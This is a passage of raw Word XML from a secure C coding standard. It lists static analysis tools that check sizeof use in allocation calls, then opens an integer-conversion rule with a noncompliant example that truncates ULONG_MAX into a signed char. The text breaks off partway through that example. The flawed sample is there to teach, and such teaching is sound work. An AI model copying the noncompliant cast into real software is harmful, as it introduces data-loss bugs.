            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> and flags when it does not find a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> operator in the argument expression. It does not flag if the return value is assigned to a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>char *</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>; in this case a string is being allocated, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> is unnecessary because </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>(char) == 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="1BD6F81E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608B3879" w14:textId="37636655" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>ECLAIR</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58025751" w14:textId="7B598AF0" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDCA4B3" w14:textId="2C7C6F1B" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CC2.EXP09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A764E8" w14:textId="3CBF2D2F" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Can detect violations of this recommendation. In particular, it </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>considers when the size of a type is used by </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>malloc(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> and flags these functions if either the size argument does not use a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> operator, or the size argument uses </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, but the type of the returned value is not a pointer to the type of the argument to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>. It does not flag if the returned value is assigned to a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>char *</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="09447F88" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD5512D" w14:textId="4E8F4BF0" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6197D994" w14:textId="6A6117D1" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1982DF61" w14:textId="69B351FF" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>201 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC05332" w14:textId="1F5D98D4" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="7D29473E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F886105" w14:textId="364A1DC1" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFEF6A7" w14:textId="546458FE" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294925A2" w14:textId="0BC81BCE" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C: Rec. EXP09-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76357DD5" w14:textId="16DF618A" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checks for hard-coded object size used to manipulate memory (rec. fully covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="0D2FC839" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F95697" w14:textId="12ADAB59" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187BA178" w14:textId="2B93425C" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59EE3E6D" w14:textId="4B6592C5" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-without-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23DDC087" w14:textId="12BC771F" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rP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2" w:name="_Toc52464060"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="575201BF"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16B76F95" w14:textId="4489C41F" w:rsidR="00381847" w:rsidRDefault="00421EC1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>INT</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>031</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="164074C2" w14:textId="1739AB4C" w:rsidR="00381847" w:rsidRDefault="003F50B6">
            <w:r w:rsidRPr="003F50B6">
              <w:t>Ensure that integer conversions do not result in lost or misinterpreted data</w:t>
            </w:r>
            <w:r w:rsidR="00093E45">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00093E45" w:rsidRPr="00093E45">
              <w:t>Integer conversions, both implicit and explicit (using a cast), must be guaranteed not to result in lost or misinterpreted data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47E37B6A"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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01CB710" w:rsidR="00F72634" w:rsidRDefault="003F50B6" w:rsidP="00A72503">
            <w:r w:rsidRPr="003F50B6">
              <w:t>Type range errors, including loss of data (truncation) and loss of sign (sign errors), can occur when converting from a value of an unsigned integer type to a value of a signed integer type. This noncompliant code example results in a truncation error on most implementations:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="347ECF59" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3096109C" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>limits.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080809B1" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376876AF" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D9DF7EF" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">  unsigned long int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = ULONG_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>MAX;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="703D55ED" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">  signed char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7C165796" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = (signed </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>char)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>; /* Cast eliminates warning */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002B0451" w14:textId="77777777" w:rsidR="00512F6B" w:rsidRDefault="00512F6B" w:rsidP="00512F6B">
            <w:r>
              <w:t xml:space="preserve">  /* ... */</w:t>
            </w:r>
          </w:p>
